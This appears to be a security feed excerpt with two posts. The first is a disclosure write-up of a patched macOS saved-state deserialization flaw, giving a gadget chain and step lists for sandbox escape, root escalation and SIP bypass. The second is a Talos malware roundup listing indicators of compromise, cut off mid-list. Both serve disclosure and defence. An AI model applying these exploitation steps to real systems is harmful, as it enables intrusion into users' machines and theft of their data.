Before yesterdayVulnerabily Research

# Process injection: breaking all macOS security layers with a single vulnerability

12 August 2022 at 00:00

If you have created a new macOS app with Xcode 13.2, you may noticed this new method in the template:

- (BOOL)applicationSupportsSecureRestorableState:(NSApplication *)app {
return YES;
}


This was added to the Xcode template to address a process injection vulnerability we reported!

In macOS 12.0.1 Monterey, Apple fixed CVE-2021-30873. This was a process injection vulnerability affecting (essentially) all macOS AppKit-based applications. We reported this vulnerability to Apple, along with methods to use this vulnerability to escape the sandbox, elevate privileges to root and bypass the filesystem restrictions of SIP. In this post, we will first describe what process injection is, then the details of this vulnerability and finally how we abused it.

# Process injection

Process injection is the ability for one process to execute code in a different process. In Windows, one reason this is used is to evade detection by antivirus scanners, for example by a technique known as DLL hijacking. This allows malicious code to pretend to be part of a different executable. In macOS, this technique can have significantly more impact than that due to the difference in permissions two applications can have.

In the classic Unix security model, each process runs as a specific user. Each file has an owner, group and flags that determine which users are allowed to read, write or execute that file. Two processes running as the same user have the same permissions: it is assumed there is no security boundary between them. Users are security boundaries, processes are not. If two processes are running as the same user, then one process could attach to the other as a debugger, allowing it to read or write the memory and registers of that other process. The root user is an exception, as it has access to all files and processes. Thus, root can always access all data on the computer, whether on disk or in RAM.

This was, in essence, the same security model as macOS until the introduction of SIP, also known as “rootless”. This name doesn’t mean that there is no root user anymore, but it is now less powerful on its own. For example, certain files can no longer be read by the root user unless the process also has specific entitlements. Entitlements are metadata that is included when generating the code signature for an executable. Checking if a process has a certain entitlement is an essential part of many security measures in macOS. The Unix ownership rules are still present, this is an additional layer of permission checks on top of them. Certain sensitive files (e.g. the Mail.app database) and features (e.g. the webcam) are no longer possible with only root privileges but require an additional entitlement. In other words, privilege escalation is not enough to fully compromise the sensitive data on a Mac.

For example, using the following command we can see the entitlements of Mail.app:

$codesign -dvvv --entitlements - /System/Applications/Mail.app  In the output, we see the following entitlement: ... [Key] com.apple.rootless.storage.Mail [Value] [Bool] true ...  This is what grants Mail.app the permission to read the SIP protected mail database, while other malware will not be able to read it. Aside from entitlements, there are also the permissions handled by Trust, Transparency and Control (TCC). This is the mechanism by which applications can request access to, for example, the webcam, microphone and (in recent macOS versions) also files such as those in the Documents and Download folders. This means that even applications that do not use the Mac Application sandbox might not have access to certain features or files. Of course entitlements and TCC permissions would be useless if any process can just attach as a debugger to another process of the same user. If one application has access to the webcam, but the other doesn’t, then one process could attach as a debugger to the other process and inject some code to steal the webcam video. To fix this, the ability to debug other applications has been heavily restricted. Changing a security model that has been used for decades to a more restrictive model is difficult, especially in something as complicated as macOS. Attaching debuggers is just one example, there are many similar techniques that could be used to inject code into a different process. Apple has squashed many of these techniques, but many other ones are likely still undiscovered. Aside from Apple’s own code, these vulnerabilities could also occur in third-party software. It’s quite common to find a process injection vulnerability in a specific application, which means that the permissions (TCC permissions and entitlements) of that application are up for grabs for all other processes. Getting those fixed is a difficult process, because many third-party developers are not familiar with this new security model. Reporting these vulnerabilities often requires fully explaining this new model! Especially Electron applications are infamous for being easy to inject into, as it is possible to replace their JavaScript files without invalidating the code signature. More dangerous than a process injection vulnerability in one application is a process injection technique that affects multiple, or even all, applications. This would give access to a large number of different entitlements and TCC permissions. A generic process injection vulnerability affecting all applications is a very powerful tool, as we’ll demonstrate in this post. # The saved state vulnerability When shutting down a Mac, it will prompt you to ask if the currently open windows should be reopened the next time you log in. This is a part of functionally called “saved state” or “persistent UI”. When reopening the windows, it can even restore new documents that were not yet saved in some applications. It is used in more places than just at shutdown. For example, it is also used for a feature called App Nap. When application has been inactive for a while (has not been the focused application, not playing audio, etc.), then the system can tell it to save its state and terminates the process. macOS keeps showing a static image of the application’s windows and in the Dock it still appears to be running, while it is not. When the user switches back to the application, it is quickly launched and resumes its state. Internally, this also uses the same saved state functionality. When building an application using AppKit, support for saving the state is for a large part automatic. In some cases the application needs to include its own objects in the saved state to ensure the full state can be recovered, for example in a document-based application. Each time an application loses focus, it writes to the files: ~/Library/Saved Application State/<Bundle ID>.savedState/windows.plist ~/Library/Saved Application State/<Bundle ID>.savedState/data.data  The windows.plist file contains a list of all of the application’s open windows. (And some other things that don’t look like windows, such as the menu bar and the Dock menu.) For example, a windows.plist for TextEdit.app could look like this: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <array> <dict> <key>MenuBar AvailableSpace</key> <real>1248</real> <key>NSDataKey</key> <data> Ay1IqBriwup4bKAanpWcEw== </data> <key>NSIsMainMenuBar</key> <true/> <key>NSWindowID</key> <integer>1</integer> <key>NSWindowNumber</key> <integer>5978</integer> </dict> <dict> <key>NSDataKey</key> <data> 5lyzOSsKF24yEcwAKTBSVw== </data> <key>NSDragRegion</key> <data> AAAAgAIAAADAAQAABAAAAAMAAABHAgAAxgEAAAoAAAADAAAABwAAABUAAAAb AAAAKQAAAC8AAAA9AAAARwIAAMcBAAAMAAAAAwAAAAcAAAAVAAAAGwAAACkA AAAvAAAAPQAAAAkBAABLAQAARwIAANABAAAKAAAAFQAAABsAAAApAAAALwAA AD0AAAAJAQAASwEAAD4CAADWAQAABgAAAAwAAAAJAQAASwEAAD4CAADXAQAA BAAAAAwAAAA+AgAA2QEAAAIAAAD///9/ </data> <key>NSTitle</key> <string>Untitled</string> <key>NSUIID</key> <string>_NS:34</string> <key>NSWindowCloseButtonFrame</key> <string>{{7, 454}, {14, 16}}</string> <key>NSWindowFrame</key> <string>177 501 586 476 0 0 1680 1025 </string> <key>NSWindowID</key> <integer>2</integer> <key>NSWindowLevel</key> <integer>0</integer> <key>NSWindowMiniaturizeButtonFrame</key> <string>{{27, 454}, {14, 16}}</string> <key>NSWindowNumber</key> <integer>5982</integer> <key>NSWindowWorkspaceID</key> <string></string> <key>NSWindowZoomButtonFrame</key> <string>{{47, 454}, {14, 16}}</string> </dict> <dict> <key>CFBundleVersion</key> <string>378</string> <key>NSDataKey</key> <data> P7BYxMryj6Gae9Q76wpqVw== </data> <key>NSDockMenu</key> <array> <dict> <key>command</key> <integer>1</integer> <key>mark</key> <integer>2</integer> <key>name</key> <string>Untitled</string> <key>system-icon</key> <integer>1735879022</integer> <key>tag</key> <integer>2</integer> </dict> <dict> <key>separator</key> <true/> </dict> <dict> <key>command</key> <integer>2</integer> <key>indent</key> <integer>0</integer> <key>name</key> <string>New Document</string> <key>tag</key> <integer>0</integer> </dict> </array> <key>NSExecutableInode</key> <integer>1152921500311961010</integer> <key>NSIsGlobal</key> <true/> <key>NSSystemAppearance</key> <data> YnBsaXN0MDDUAQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hpdmVyVCR0b3BYJG9i amVjdHMSAAGGoF8QD05TS2V5ZWRBcmNoaXZlctEICVRyb290gAGkCwwRElUk bnVsbNINDg8QViRjbGFzc18QEE5TQXBwZWFyYW5jZU5hbWWAA4ACXxAUTlNB cHBlYXJhbmNlTmFtZUFxdWHSExQVFlokY2xhc3NuYW1lWCRjbGFzc2VzXE5T QXBwZWFyYW5jZaIVF1hOU09iamVjdAgRGiQpMjdJTFFTWF5jan1/gZidqLG+ wQAAAAAAAAEBAAAAAAAAABgAAAAAAAAAAAAAAAAAAADK </data> <key>NSSystemVersion</key> <array> <integer>12</integer> <integer>2</integer> <integer>1</integer> </array> <key>NSWindowID</key> <integer>4294967295</integer> <key>NSWindowZOrder</key> <array> <integer>5982</integer> </array> </dict> </array> </plist>  The data.data file contains a custom binary format. It consists of a list of records, each record contains an AES-CBC encrypted serialized object. The windows.plist file contains the key (NSDataKey) and a ID (NSWindowID) for the record from data.data it corresponds to.1 For example: 00000000 4e 53 43 52 31 30 30 30 00 00 00 01 00 00 01 b0 |NSCR1000........| 00000010 ec f2 26 b9 8b 06 c8 d0 41 5d 73 7a 0e cc 59 74 |..&.....A]sz..Yt| 00000020 89 ac 3d b3 b6 7a ab 1b bb f7 84 0c 05 57 4d 70 |..=..z.......WMp| 00000030 cb 55 7f ee 71 f8 8b bb d4 fd b0 c6 28 14 78 23 |.U..q.......(.x#| 00000040 ed 89 30 29 92 8c 80 bf 47 75 28 50 d7 1c 9a 8a |..0)....Gu(P....| 00000050 94 b4 d1 c1 5d 9e 1a e0 46 62 f5 16 76 f5 6f df |....]...Fb..v.o.| 00000060 43 a5 fa 7a dd d3 2f 25 43 04 ba e2 7c 59 f9 e8 |C..z../%C...|Y..| 00000070 a4 0e 11 5d 8e 86 16 f0 c5 1d ac fb 5c 71 fd 9d |...]........\q..| 00000080 81 90 c8 e7 2d 53 75 43 6d eb b6 aa c7 15 8b 1a |....-SuCm.......| 00000090 9c 58 8f 19 02 1a 73 99 ed 66 d1 91 8a 84 32 7f |.X....s..f....2.| 000000a0 1f 5a 1e e8 ae b3 39 a8 cf 6b 96 ef d8 7b d1 46 |.Z....9..k...{.F| 000000b0 0c e2 97 d5 db d4 9d eb d6 13 05 7d e0 4a 89 a4 |...........}.J..| 000000c0 d0 aa 40 16 81 fc b9 a5 f5 88 2b 70 cd 1a 48 94 |[email protected]+p..H.| 000000d0 47 3d 4f 92 76 3a ee 34 79 05 3f 5d 68 57 7d b0 |G=O.v:.4y.?]hW}.| 000000e0 54 6f 80 4e 5b 3d 53 2a 6d 35 a3 c9 6c 96 5f a5 |To.N[=S*m5..l._.| 000000f0 06 ec 4c d3 51 b9 15 b8 29 f0 25 48 2b 6a 74 9f |..L.Q...).%H+jt.| 00000100 1a 5b 5e f1 14 db aa 8d 13 9c ef d6 f5 53 f1 49 |.[^..........S.I| 00000110 4d 78 5a 89 79 f8 bd 68 3f 51 a2 a4 04 ee d1 45 |MxZ.y..h?Q.....E| 00000120 65 ba c4 40 ad db e3 62 55 59 9a 29 46 2e 6c 07 |[email protected])F.l.| 00000130 34 68 e9 00 89 15 37 1c ff c8 a5 d8 7c 8d b2 f0 |4h....7.....|...| 00000140 4b c3 26 f9 91 f8 c4 2d 12 4a 09 ba 26 1d 00 13 |K.&....-.J..&...| 00000150 65 ac e7 66 80 c0 e2 55 ec 9a 8e 09 cb 39 26 d4 |e..f...U.....9&.| 00000160 c8 15 94 d8 2c 8b fa 79 5f 62 18 39 f0 a5 df 0b |....,..y_b.9....| 00000170 3d a4 5c bc 30 d5 2b cc 08 88 c8 49 d6 ab c0 e1 |=.\.0.+....I....| 00000180 c1 e5 41 eb 3e 2b 17 80 c4 01 64 3d 79 be 82 aa |..A.>+....d=y...| 00000190 3d 56 8d bb e5 7a ea 89 0f 4c dc 16 03 e9 2a d8 |=V...z...L....*.| 000001a0 c5 3e 25 ed c2 4b 65 da 8a d9 0d d9 23 92 fd 06 |.>%..Ke.....#...| [...]  Whenever an application is launched, AppKit will read these files and restore the windows of the application. This happens automatically, without the app needing to implement anything. The code for reading these files is quite careful: if the application crashed, then maybe the state is corrupted too. If the application crashes while restoring the state, then the next time the state is discarded and it does a fresh start. The vulnerability we found is that the encrypted serialized object stored in the data.data file was not using “secure coding”. To explain what that means, we’ll first explain serialization vulnerabilities, in particular on macOS. ## Serialized objects Many object-oriented programming languages have added support for binary serialization, which turns an object into a bytestring and back. Contrary to XML and JSON, these are custom, language specific formats. In some programming languages, serialization support for classes is automatic, in other languages classes can opt-in. In many of those languages these features have lead to vulnerabilities. The problem in many implementations is that an object is created first, and then its type is checked. Methods may be called on these objects when creating or destroying them. By combining objects in unusual ways, it is sometimes possible to gain remote code execution when a malicious object is deserialized. It is, therefore, not a good idea to use these serialization functions for any data that might be received over the network from an untrusted party. For Python pickle and Ruby Marshall.load remote code execution is straightforward. In Java ObjectInputStream.readObject and C#, RCE is possible if certain commonly used libraries are used. The ysoserial and ysoserial.net tools can be used to generate a payload depending on the libraries in use. In PHP, exploitability for RCE is rare. ### Objective-C serialization In Objective-C, classes can implement the NSCoding protocol to be serializable. Subclasses of NSCoder, such as NSKeyedArchiver and NSKeyedUnarchiver, can be used to serialize and deserialize these objects. How this works in practice is as follows. A class that implements NSCoding must include a method: - (id)initWithCoder:(NSCoder *)coder;  In this method, this object can use coder to decode its instance variables, using methods such as -decodeObjectForKey:, -decodeIntegerForKey:, -decodeDoubleForKey:, etc. When it uses -decodeObjectForKey:, the coder will recursively call -initWithCoder: on that object, eventually decoding the entire graph of objects. Apple has also realized the risk of deserializing untrusted input, so in 10.8, the NSSecureCoding protocol was added. The documentation for this protocol states: A protocol that enables encoding and decoding in a manner that is robust against object substitution attacks. This means that instead of creating an object first and then checking its type, a set of allowed classes needs to be included when decoding an object. So instead of the unsafe construction: id obj = [decoder decodeObjectForKey:@"myKey"]; if (![obj isKindOfClass:[MyClass class]]) { /* ...fail... */ }  The following must be used: id obj = [decoder decodeObjectOfClass:[MyClass class] forKey:@"myKey"];  This means that when a secure coder is created, -decodeObjectForKey: is no longer allowed, but -decodeObjectOfClass:forKey: must be used. That makes exploitable vulnerabilities significantly harder, but it could still happen. One thing to note here is that subclasses of the specified class are allowed. If, for example, the NSObject class is specified, then all classes implementing NSCoding are still allowed. If only NSDictionary are expected and an imported framework contains a rarely used and vulnerable subclass of NSDictionary, then this could also create a vulnerability. In all of Apple’s operating systems, these serialized objects are used all over the place, often for inter-process exchange of data. For example, NSXPCConnection heavily relies on secure serialization for implementing remote method calls. In iMessage, these serialized objects are even exchanged with other users over the network. In such cases it is very important that secure coding is always enabled. ## Creating a malicious serialized object In the data.data file for saved states, objects were stored using an NSKeyedArchiver without secure coding enabled. This means we could include objects of any class that implements the NSCoding protocol. The likely reason for this is that applications can extend the saved state with their own objects, and because the saved state functionality is older than NSSecureCoding, Apple couldn’t just upgrade this to secure coding, as this could break third-party applications. To exploit this, we wanted a method for constructing a chain of objects that could allows us to execute arbitrary code. However, no project similar to ysoserial for Objective-C appears to exist and we could not find other examples of abusing insecure deserialization in macOS. In Remote iPhone Exploitation Part 1: Poking Memory via iMessage and CVE-2019-8641 Samuel Groß of Google Project Zero describes an attack against a secure coder by abusing a vulnerability in NSSharedKeyDictionary, an uncommon subclass of NSDictionary. As this vulnerability is now fixed, we couldn’t use this. By decompiling a large number of -initWithCoder: methods in AppKit, we eventually found a combination of 2 objects that we could use to call arbitrary Objective-C methods on another deserialized object. We start with NSRuleEditor. The -initWithCoder: method of this class creates a binding to an object from the same archive with a key path also obtained from the archive. Bindings are a reactive programming technique in Cocoa. It makes it possible to directly bind a model to a view, without the need for the boilerplate code of a controller. Whenever a value in the model changes, or the user makes a change in the view, the changes are automatically propagated. A binding is created calling the method: - (void)bind:(NSBindingName)binding toObject:(id)observable withKeyPath:(NSString *)keyPath options:(NSDictionary<NSBindingOption, id> *)options;  This binds the property binding of the receiver to the keyPath of observable. A keypath a string that can be used, for example, to access nested properties of the object. But the more common method for creating bindings is by creating them as part of a XIB file in Xcode. For example, suppose the model is a class Person, which has a property @property (readwrite, copy) NSString *name;. Then you could bind the “value” of a text field to the “name” keypath of a Person to create a field that shows (and can edit) the person’s name. In the XIB editor, this would be created as follows: The different options for what a keypath can mean are actually quite complicated. For example, when binding with a keypath of “foo”, it would first check if one the methods getFoo, foo, isFoo and _foo exists. This would usually be used to access a property of the object, but this is not required. When a binding is created, the method will be called immediately when creating the binding, to provide an initial value. It does not matter if that method actually returns void. This means that by creating a binding during deserialization, we can use this to call zero-argument methods on other deserialized objects! ID NSRuleEditor::initWithCoder:(ID param_1,SEL param_2,ID unarchiver) { ... id arrayOwner = [unarchiver decodeObjectForKey:@"NSRuleEditorBoundArrayOwner"]; ... if (arrayOwner) { keyPath = [unarchiver decodeObjectForKey:@"NSRuleEditorBoundArrayKeyPath"]; [self bind:@"rows" toObject:arrayOwner withKeyPath:keyPath options:nil]; } ... }  In this case we use it to call -draw on the next object. The next object we use is an NSCustomImageRep object. This obtains a selector (a method name) as a string and an object from the archive. When the -draw method is called, it invokes the method from the selector on the object. It passes itself as the first argument:  ID NSCustomImageRep::initWithCoder:(ID param_1,SEL param_2,ID unarchiver) { ... id drawObject = [unarchiver decodeObjectForKey:@"NSDrawObject"]; self.drawObject = drawObject; id drawMethod = [unarchiver decodeObjectForKey:@"NSDrawMethod"]; SEL selector = NSSelectorFromString(drawMethod); self.drawMethod = selector; ... } ... void ___24-[NSCustomImageRep_draw]_block_invoke(long param_1) { ... [self.drawObject performSelector:self.drawMethod withObject:self]; ... }  By deserializing these two classes we can now call zero-argument methods and multiple argument methods, although the first argument will be an NSCustomImageRep object and the remaining arguments will be whatever happens to still be in those registers. Nevertheless, is a very powerful primitive. We’ll cover the rest of the chain we used in a future blog post. # Exploitation ## Sandbox escape First of all, we escaped the Mac Application sandbox with this vulnerability. To explain that, some more background on the saved state is necessary. In a sandboxed application, many files that would be stored in ~/Library are stored in a separate container instead. So instead of saving its state in: ~/Library/Saved Application State/<Bundle ID>.savedState/  Sandboxed applications save their state to: ~/Library/Containers/<Bundle ID>/Data/Library/Saved Application State/<Bundle ID>.savedState/  Apparently, when the system is shut down while an application is still running (when the prompt is shown asking the user whether to reopen the windows the next time), the first location is symlinked to the second one by talagent. We are unsure of why, it might have something to do with upgrading an application to a new version which is sandboxed. Secondly, most applications do not have access to all files. Sandboxed applications are very restricted of course, but with the addition of TCC even accessing the Downloads, Documents, etc. folders require user approval. If the application would open an open or save panel, it would be quite inconvenient if the user could only see the files that that application has access to. To solve this, a different process is launched when opening such a panel: com.apple.appkit.xpc.openAndSavePanelService. Even though the window itself is part of the application, its contents are drawn by openAndSavePanelService. This is an XPC service which has full access to all files. When the user selects a file in the panel, the application gains temporary access to that file. This way, users can still browse their entire disk even in applications that do not have permission to list those files. As it is an XPC service with service type Application, it is launched separately for each app. What we noticed is that this XPC Service reads its saved state, but using the bundle ID of the app that launched it! As this panel might be part of the saved state of multiple applications, it does make some sense that it would need to separate its state per application. As it turns out, it reads its saved state from the location outside of the container, but with the application’s bundle ID: ~/Library/Saved Application State/<Bundle ID>.savedState/  But as we mentioned if the app was ever open when the user shut down their computer, then this will be a symlink to the container path. Thus, we can escape the sandbox in the following way: 1. Wait for the user to shut down while the app is open, if the symlink does not yet exist. 2. Write malicious data.data and windows.plist files inside the app’s own container. 3. Open an NSOpenPanel or NSSavePanel. The com.apple.appkit.xpc.openAndSavePanelService process will now deserialize the malicious object, giving us code execution in a non-sandboxed process. This was fixed earlier than the other issues, as CVE-2021-30659 in macOS 11.3. Apple addressed this by no longer loading the state from the same location in com.apple.appkit.xpc.openAndSavePanelService. ## Privilege escalation By injecting our code into an application with a specific entitlement, we can elevate our privileges to root. For this, we could apply the technique explained by A2nkF in Unauthd - Logic bugs FTW. Some applications have an entitlement of com.apple.private.AuthorizationServices containing the value system.install.apple-software. This means that this application is allowed to install packages that have a signature generated by Apple without authorization from the user. For example, “Install Command Line Developer Tools.app” and “Bootcamp Assistant.app” have this entitlement. A2nkF also found a package signed by Apple that contains a vulnerability: macOSPublicBetaAccessUtility.pkg. When this package is installed to a specific disk, it will run (as root) a post-install script from that disk. The script assumes it is being installed to a disk containing macOS, but this is not checked. Therefore, by creating a malicious script at the same location it is possible to execute code as root by installing this package. The exploitation steps are as follows: 1. Create a RAM disk and copy a malicious script to the path that will be executed by macOSPublicBetaAccessUtility.pkg. 2. Inject our code into an application with the com.apple.private.AuthorizationServices entitlement containing system.install.apple-software by creating the windows.plist and data.data files for that application and then launching it. 3. Use the injected code to install the macOSPublicBetaAccessUtility.pkg package to the RAM disk. 4. Wait for the post-install script to run. In the writeup from A2nkF, the post-install script ran without the filesystem restrictions of SIP. It inherited this from the installation process, which needs it as package installation might need to write to SIP protected locations. This was fixed by Apple: post- and pre-install scripts are no longer SIP exempt. The package and its privilege escalation can still be used, however, as Apple still uses the same vulnerable installer package. ## SIP filesystem bypass Now that we have escaped the sandbox and elevated our privilages to root, we did want to bypass SIP as well. To do this, we looked around at all available applications to find one with a suitable entitlement. Eventually, we found something on the macOS Big Sur Beta installation disk image: “macOS Update Assistant.app” has the com.apple.rootless.install.heritable entitlement. This means that this process can write to all SIP protected locations (and it is heritable, which is convenient because we can just spawn a shell). Although it is supposed to be used only during the beta installation, we can just copy it to a normal macOS environment and run it there. The exploitation for this is quite simple: 1. Create malicious windows.plist and data.data files for “macOS Update Assistant.app”. 2. Launch “macOS Update Assistant.app”. When exempt from SIP’s filesystem restrictions, we can read all files from protected locations, such as the user’s Mail.app mailbox. We can also modify the TCC database, which means we can grant ourself permission to access the webcam, microphone, etc. We could also persist our malware on locations which are protected by SIP, making it very difficult to remove by anyone other than Apple. Finally, we can change the database of approved kernel extensions. This means that we could load a new kernel extension silently, without user approval. When combined with a vulnerable kernel extension (or a codesigning certificate that allows signing kernel extensions), we would have been able to gain kernel code execution, which would allow disabling all other restrictions too. # Demo We recorded the following video to demonstrate the different steps. It first shows that the application “Sandbox” is sandboxed, then it escapes its sandbox and launches “Privesc”. This elevates privileges to root and launches “SIP Bypass”. Finally, this opens a reverse shell that is exempt from SIP’s filesystem restrictions, which is demonstrated by writing a file in /var/db/SystemPolicyConfiguration (the location where the database of approved kernel modules is stored): # The fix Apple first fixed the sandbox escape in 11.3, by no longer reading the saved state of the application in com.apple.appkit.xpc.openAndSavePanelService (CVE-2021-30659). Fixing the rest of the vulnerability was more complicated. Third-party applications may store their own objects in the saved state and these objects might not support secure coding. This brings us back to the method from the introduction: -applicationSupportsSecureRestorableState:. Applications can now opt-in to requiring secure coding for their saved state by returning TRUE from this method. Unless an app opts in, it will keep allowing non-secure coding, which means process injection might remain possible. This does highlight one issue with the current design of these security measures: downgrade attacks. The code signature (and therefore entitlements) of an application will remain valid for a long time, and the TCC permissions of an application will still work if the application is downgraded. A non-sandboxed application could just silently download an older, vulnerable version of an application and exploit that. For the SIP bypass this would not work, as “macOS Update Assistant.app” does not run on macOS Monterey because certain private frameworks no longer contain the necessary symbols. But that is a coincidental fix, in many other cases older applications may still run fine. This vulnerability will therefore be present for as long as there is backwards compatibility with older macOS applications! Nevertheless, if you write an Objective-C application, please make sure you add -applicationSupportsSecureRestorableState: to return TRUE and to adapt secure coding for all classes used for your saved states! # Conclusion In the current security architecture of macOS, process injection is a powerful technique. A generic process injection vulnerability can be used to escape the sandbox, elevate privileges to root and to bypass SIP’s filesystem restrictions. We have demonstrated how we used the use of insecure deserialization in the loading of an application’s saved state to inject into any Cocoa process. This was addressed by Apple in the macOS Monterey update. 1. It is unclear what security the AES encryption here is meant to add, as the key is stored right next to it. There is no MAC, so no integrity check for the ciphertext. ↩︎ # Threat Roundup for August 5 to August 12 12 August 2022 at 20:12 Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 5 and Aug. 12. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files. The most prevalent threats highlighted in this roundup are: Threat Name Type Description Win.Dropper.Tofsee-9960568-0 Dropper Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the size of the botnet under the operator's control. Win.Dropper.TrickBot-9960840-0 Dropper Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. Win.Trojan.Zusy-9960880-0 Trojan Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information. Win.Dropper.DarkComet-9961766-1 Dropper DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. This malware can download files from a user's machine, mechanisms for persistence and hiding. It also has the ability to send back usernames and passwords from the infected system. Win.Ransomware.TeslaCrypt-9960924-0 Ransomware TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransomware, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily. Win.Virus.Xpiro-9960895-1 Virus Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks. Win.Dropper.Emotet-9961142-0 Dropper Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. Win.Dropper.Remcos-9961392-0 Dropper Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. Win.Dropper.Ramnit-9961396-0 Dropper Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It also has the ability to steal browser cookies and attempts to hide from popular antivirus software. ## Threat Breakdown ### Win.Dropper.Tofsee-9960568-0 #### Indicators of Compromise • IOCs collected from dynamic analysis of 10 samples Registry Keys Occurrences <HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config4  3 <HKU>\.DEFAULT\CONTROL PANEL\BUSES  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: LanguageList  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-100  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-101  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-103  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\dhcpqec.dll,-102  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-1  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-2  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-4  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\napipsec.dll,-3  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\tsgqec.dll,-100  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\tsgqec.dll,-101  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\tsgqec.dll,-102  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\tsgqec.dll,-103  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-100  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-101  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-102  3 <HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E Value Name: @%SystemRoot%\system32\eapqec.dll,-103  3 <HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config0  3 <HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config1  3 <HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config2  3 <HKU>\.DEFAULT\CONTROL PANEL\BUSES Value Name: Config3  3 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV Value Name: ErrorControl  1 <HKLM>\SYSTEM\CONTROLSET001\SERVICES\FNWISXTV Value Name: DisplayName  1 Mutexes Occurrences Global\27a1e0c1-13fc-11ed-9660-001517101edf 1 Global\30977501-13fc-11ed-9660-001517215b93 1 IP Addresses contacted by malware. Does not indicate maliciousness Occurrences 216[.]146[.]35[.]35 3 31[.]13[.]65[.]174 3 142[.]251[.]40[.]196 3 96[.]103[.]145[.]165 3 31[.]41[.]244[.]82 3 31[.]41[.]244[.]85 3 80[.]66[.]75[.]254 3 80[.]66[.]75[.]4 3 31[.]41[.]244[.]128 3 31[.]41[.]244[.]126/31 3 208[.]76[.]51[.]51 2 74[.]208[.]5[.]20 2 208[.]76[.]50[.]50 2 202[.]137[.]234[.]30 2 212[.]77[.]101[.]4 2 193[.]222[.]135[.]150 2 203[.]205[.]219[.]57 2 47[.]43[.]18[.]9 2 67[.]231[.]144[.]94 2 188[.]125[.]72[.]74 2 40[.]93[.]207[.]0/31 2 205[.]220[.]176[.]72 2 135[.]148[.]130[.]75 2 121[.]53[.]85[.]11 2 67[.]195[.]204[.]72/30 1 *See JSON for more IOCs Domain Names contacted by malware. Does not indicate maliciousness Occurrences 249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 3 249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 3 249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 3 